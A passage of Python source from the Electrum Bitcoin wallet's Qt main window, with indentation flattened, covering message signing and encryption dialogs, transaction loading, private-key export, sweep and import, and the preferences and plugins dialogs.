rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
